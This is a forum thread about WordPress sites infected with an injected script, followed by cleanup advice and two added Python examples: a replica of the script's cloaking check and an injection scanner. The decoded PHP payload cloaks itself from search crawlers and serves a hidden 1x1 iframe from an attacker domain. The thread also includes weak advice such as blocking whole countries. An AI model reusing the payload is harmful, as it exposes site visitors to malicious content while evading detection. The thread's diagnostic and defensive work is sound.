I Need Smart People To Solve This Wordpress Virus Mystery...

11 replies
I have several WordPress sites that have caught a virus. This code embeds itself in all the index.php or index.html files in my source code (WordPress, as well as my Rapid Action Profits sales pages).

I've decoded the base64 and this is what it looks like. Can anyone figure out where it is hiding and how the heck I get rid of it?!?!

Please help!!


error_reporting(0);   // suppress PHP warnings so nothing unusual shows on the page
$bot = FALSE;
// Visitors whose User-Agent contains one of these substrings get no iframe (strpos is case-sensitive)
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwlyl3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// Visitors from these address ranges (search-engine crawler space: Google, Yahoo, Microsoft and others) get no iframe either
$stop_ips_masks = array(
  array("216.239.32.0","216.239.63.255"),
  array("64.68.80.0","64.68.87.255"),
  array("66.102.0.0","66.102.15.255"),
  array("64.233.160.0","64.233.191.255"),
  array("66.249.64.0","66.249.95.255"),
  array("72.14.192.0","72.14.255.255"),
  array("209.85.128.0","209.85.255.255"),
  array("198.108.100.192","198.108.100.207"),
  array("173.194.0.0","173.194.255.255"),
  array("216.33.229.144","216.33.229.151"),
  array("216.33.229.160","216.33.229.167"),
  array("209.185.108.128","209.185.108.255"),
  array("216.109.75.80","216.109.75.95"),
  array("64.68.88.0","64.68.95.255"),
  array("64.68.64.64","64.68.64.127"),
  array("64.41.221.192","64.41.221.207"),
  array("74.125.0.0","74.125.255.255"),
  array("65.52.0.0","65.55.255.255"),
  array("74.6.0.0","74.6.255.255"),
  array("67.195.0.0","67.195.255.255"),
  array("72.30.0.0","72.30.255.255"),
  array("38.0.0.0","38.255.255.255")
);
// Compare the visitor's address, as an unsigned integer, against every range above
$my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
foreach ($stop_ips_masks as $IPs) {
  $first_d  = sprintf("%u", ip2long($IPs[0]));
  $second_d = sprintf("%u", ip2long($IPs[1]));
  if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) { $bot = TRUE; break; }
}
// Substring match of the User-Agent against the list above
foreach ($user_agent_to_filter as $bot_sign) {
  if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false) { $bot = true; break; }
}
// Everyone who is not classed as a crawler gets a hidden 1x1 iframe pointing at the attacker's domain
if (!$bot) {
  echo '<iframe src="http://hdfshtrehsht.co.cc/QQkFBg0MBAEDAAABEkcJBQYNDA0DDQABBg==" width="1" height="1"></iframe>';
}
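To see who the decoded snippet actually hides from, here is its cloaking check rewritten in Python. This is an added example, not code from the thread: the address ranges and user-agent substrings are copied from the decoded PHP above, while the four sample requests (documentation addresses 66.249.66.1, 72.30.1.1 and 203.0.113.5, plus a made-up hostname) are constructed for illustration.

```python
"""Replica of the cloaking decision in the decoded snippet from the post.

Added example, not code from the thread. The ranges and substrings are
copied from the decoded PHP; the sample requests are constructed.
"""
import ipaddress

# Visitor address ranges the snippet treats as "bot" (copied from $stop_ips_masks).
STOP_IP_RANGES = [
    ("216.239.32.0", "216.239.63.255"), ("64.68.80.0", "64.68.87.255"),
    ("66.102.0.0", "66.102.15.255"), ("64.233.160.0", "64.233.191.255"),
    ("66.249.64.0", "66.249.95.255"), ("72.14.192.0", "72.14.255.255"),
    ("209.85.128.0", "209.85.255.255"), ("198.108.100.192", "198.108.100.207"),
    ("173.194.0.0", "173.194.255.255"), ("216.33.229.144", "216.33.229.151"),
    ("216.33.229.160", "216.33.229.167"), ("209.185.108.128", "209.185.108.255"),
    ("216.109.75.80", "216.109.75.95"), ("64.68.88.0", "64.68.95.255"),
    ("64.68.64.64", "64.68.64.127"), ("64.41.221.192", "64.41.221.207"),
    ("74.125.0.0", "74.125.255.255"), ("65.52.0.0", "65.55.255.255"),
    ("74.6.0.0", "74.6.255.255"), ("67.195.0.0", "67.195.255.255"),
    ("72.30.0.0", "72.30.255.255"), ("38.0.0.0", "38.255.255.255"),
]

# User-Agent substrings the snippet treats as "bot" (copied from $user_agent_to_filter).
BOT_UA_SUBSTRINGS = [
    "bot", "spider", "spyder", "crawl", "validator", "slurp", "docomo", "yandex",
    "mail.ru", "alexa.com", "postrank.com", "htmldoc", "webcollage", "blogpulse.com",
    "anonymouse.org", "12345", "httpclient", "buzztracker.com", "snoopy", "feedtools",
    "arianna.libero.it", "internetseer.com", "openacoon.de", "rrrrrrrrr", "magent",
    "download master", "drupal.org", "vlc media player", "vvrkimsjuwlyl3ufmjrx",
    "szn-image-resizer", "bdbrandprotect.com", "wordpress", "rssreader", "mybloglog api",
]


def ip_in_stop_ranges(ip):
    """Mirror of the ip2long() range loop.

    PHP's ip2long() returns false for anything that is not dotted IPv4, which
    sprintf('%u') turns into 0, so such a visitor is outside every range.
    """
    try:
        addr = int(ipaddress.IPv4Address(ip))
    except ipaddress.AddressValueError:
        return False
    return any(
        int(ipaddress.IPv4Address(lo)) <= addr <= int(ipaddress.IPv4Address(hi))
        for lo, hi in STOP_IP_RANGES
    )


def ua_looks_like_bot(ua):
    """Mirror of the strpos() loop. strpos() is case-sensitive, so "Googlebot"
    matches through 'bot', but "WordPress/3.1" does not match 'wordpress'."""
    return any(sig in ua for sig in BOT_UA_SUBSTRINGS)


def serves_iframe(ip, ua):
    """True when the snippet would emit the 1x1 iframe to this visitor."""
    return not (ip_in_stop_ranges(ip) or ua_looks_like_bot(ua))


# Constructed sample requests (documentation addresses, not real visitors).
SAMPLE_REQUESTS = {
    "googlebot": ("66.249.66.1",
                  "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"),
    "yahoo_slurp": ("72.30.1.1",
                    "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"),
    "wp_pingback": ("203.0.113.5", "WordPress/3.1; http://blog.example.invalid"),
    "firefox_visitor": ("203.0.113.5",
                        "Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0"),
}


def classify_samples():
    """Map each sample request name to whether the iframe would be served."""
    return {name: serves_iframe(ip, ua) for name, (ip, ua) in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, served in classify_samples().items():
        print(f"{name:16s} iframe served: {served}")
```

Run it and the Googlebot and Yahoo Slurp requests get nothing while the ordinary Firefox visitor gets the iframe. That is why the page can look clean when it is fetched from a crawler's address or with a bot-looking agent, and why you should check a suspect site from an ordinary browser on an ordinary connection and compare against the raw file on disk. Because the substring check is case-sensitive, WordPress's own "WordPress/3.1" pingback agent is not excluded even though 'wordpress' is in the list.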
  • AzzamS:
    You need to tell us what the virus is doing. We need to understand it to find a solution.
  • McBob:
    To be honest: Once your server has been compromised there's only one way to be sure you are getting rid of everything and that is to wipe and reinstall the server (complete OS etc).

    It's impossible to tell what level of access the attacker gained: whether or not he managed to install and load kernel modules that may or may not be hiding his activity, whether or not he replaced apache, php, perl or other programs with his own modified versions, and so on.
  • jasonthewebmaster:
    Yep, you will most likely not be able to get rid of it unless you wipe everything out and start over.

    Do you have recent backups from before it happened?

    Also, I would look at this for the future:
    Hardening WordPress « WordPress Codex
    (How to secure your wordpress site)
  • jasonthewebmaster:
    I have seen this before.

    It's inserting a 1 pixel by 1 pixel iframe into your site. This allows them to put anything they want in that iframe and load it into your site.

    Look for files that don't belong in your site.

    Typically they are able to insert the encoded string into your index.php file through one of your web forms, using SQL Injection or something like that.


    Also, blacklist those IP addresses and any IP addresses from visitors that you can trace to outside countries that visited your server about the time they attacked your site. It won't stop them for good, but at least it will slow them down a bit and give you time to recover.
    • kenwarrior:
      Originally Posted by jasonthewebmaster:
      Also, blacklist those IP addresses and any IP addresses from visitors that you can trace to outside countries that visited your server about the time they attacked your site. It won't stop them for good, but at least it will slow them down a bit and give you time to recover.
      Is there any simple way of blocking traffic from certain countries like Russia, India, China etc. using features available in either cPanel or WordPress?

      It seems like I would not be missing much by blocking that traffic; that is where most internet hacks seem to originate from.
  • kenwarrior:
    I had the iframe code problem on a few of my blogs. I was alerted by Google Webmaster Tools, a very useful feature. Upgrading to WP 3.1 seemed to help. I found that the index.php file had been edited and a line of code added; I deleted that line. So far I'm now clean, but I will have to wait a while to see if it lasts.

    I did notice that the sites I'd had a problem with were those using a Yahoo Answers plugin and were auto-blogging some content. I'm not 100% sure if that was a security weak point or not; I've since removed the plugin for other reasons as well as this issue.
  • iamsuneel:
    The first and foremost reason blogs get hacked is the FTP program that we use.

    Now, don't shout at me; let me finish.

    As we access several websites there is a good chance of a trojan silently entering our system. This might be a simple worm which passes the typed words through keyloggers, but it is potentially dangerous when sensitive information is accessed.

    We normally use FTP programs to modify or upload some content online and, to save time, we select the 'Save Password' option so that we do not have to type the password again and again. This saved password is normally what these trojans keep tabs on.

    I faced the same problem a few months back and came across an article which stated the above reason.

    I used WP Scanner plugin to check and delete the malicious code.
    • kenwarrior:
      Originally Posted by iamsuneel:
      I used WP Scanner plugin to check and delete the malicious code.
      Could you post the exact plugin that you use? There seem to be several out there with similar names.

      thanks
      • Adam H:
        iamsuneel is correct: the most likely cause of infection is via your own FTP; another cause could be a poorly coded theme. If all the sites are WordPress it's a pretty simple fix, but time consuming.

        Delete all files on the server. This means you need to download and upload fresh versions of WordPress, themes and plugins, making sure your config files are entered back correctly so that no data is lost.

        Before re-uploading fresh files you will need to change passwords on everything: WordPress admin, FTP, cPanel etc.

        Once you have everything re-uploaded and running, I highly recommend setting theme files to file permissions of 644 so that themes can not be edited via the WordPress admin panel or "some" 3rd party backdoor scripts.

        The likelihood is that there are files left on your server currently which will continue to allow these people into your server, so unless you delete all files and re-upload fresh ones it's likely to happen again and again.

        When this happened to me a couple of years ago I actually changed cPanel/FTP passwords every time I logged in to the server, because one of the files which was hidden on the server was sending out the FTP login every time I entered FTP. Clever stuff, but incredibly annoying. At the time I couldn't wipe the server for certain reasons, but as soon as I got the go-ahead it was done and no problems after that point.

        Good luck, could be a very long frustrating trip for you.
        • kernelpaniker:
          If you aren't running your own server then you are most likely on a shared server. The "hacker" probably got in via one of the other accounts on the server. Then he/she injected code to (probably) all .php files.

          Remove the injected code and you will probably be fine until it happens again.
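jasonthewebmaster's "look for files that don't belong", Adam H's fresh-copy re-upload and kernelpaniker's "remove the injected code" come down to two checks you can script before you wipe anything: decode every eval(base64_decode(...)) wrapper found in index.php and index.html files, and list files that a clean download of the same versions does not contain. The following is an added example, not code from the thread, from WordPress or from any plugin named in it: the sample site tree, the payload string, the hostname payload.example.invalid and the file names under the temporary directories are constructed for illustration.

```python
"""Find base64-wrapped injections and files a clean copy does not have.

Added example, not code from the thread. The site tree, the payload and the
file names are constructed here so the script runs offline.
"""
import base64
import os
import re
import tempfile

# eval(base64_decode('....')) with single or double quotes and optional whitespace.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)", re.I)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=[\"']([^\"']+)[\"']", re.I)

SCAN_NAMES = {"index.php", "index.html"}
# Files that legitimately exist on a live site but not in a fresh download.
SITE_SPECIFIC = {"wp-config.php", ".htaccess"}


def decode_injections(text):
    """Return [(decoded_php, [iframe_src, ...]), ...] for every wrapper in text."""
    found = []
    for m in EVAL_B64.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not real base64, skip it
            continue
        found.append((decoded, IFRAME_SRC.findall(decoded)))
    return found


def scan_tree(root):
    """Map relative path -> injections for every index.php/index.html under root."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in SCAN_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = decode_injections(fh.read())
            if hits:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return results


def _relative_files(root):
    out = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            out.add(os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/"))
    return out


def extra_files(installed_root, clean_root):
    """Files present in the live tree but absent from the clean reference tree."""
    extras = _relative_files(installed_root) - _relative_files(clean_root)
    return {p for p in extras if os.path.basename(p) not in SITE_SPECIFIC}


def _write(root, rel, content):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def build_sample_site():
    """Construct a clean reference tree and an 'infected' live tree; return (live, clean)."""
    clean = tempfile.mkdtemp(prefix="wp-clean-")
    live = tempfile.mkdtemp(prefix="wp-live-")
    clean_index = "<?php\n/** Front to the WordPress application. */\nrequire './wp-blog-header.php';\n"
    for root in (clean, live):
        _write(root, "index.php", clean_index)
        _write(root, "wp-includes/version.php", "<?php\n$wp_version = '3.1';\n")
    # Live tree only: site-specific config, an injected index.php and a dropped file.
    _write(live, "wp-config.php", "<?php\ndefine('DB_NAME', 'example');\n")
    payload_php = 'echo \'<iframe src="http://payload.example.invalid/x" width="1" height="1"></iframe>\';'
    wrapper = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(payload_php.encode()).decode()
    _write(live, "index.php", wrapper + clean_index)
    _write(live, "wp-content/uploads/.cache.php",
           "<?php /* constructed stand-in for a dropped backdoor */ ?>\n")
    return live, clean


if __name__ == "__main__":
    live, clean = build_sample_site()
    for rel, hits in scan_tree(live).items():
        for decoded, srcs in hits:
            print(f"{rel}: injection decodes to {decoded!r}; iframe targets {srcs}")
    print("files not in clean copy:", sorted(extra_files(live, clean)))
```

Run the scan before deleting anything so you keep a record of what was injected where, then point it at the real docroot. The extra-files list is only as good as the reference copy: take it from a fresh download of the same WordPress, theme and plugin versions, and expect site-specific files (wp-config.php, .htaccess, uploads) to need an allowlist like SITE_SPECIFIC. A clean result is not proof the server is clean, which is McBob's point above; it tells you what to remove, not whether the attacker still has a way back in.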
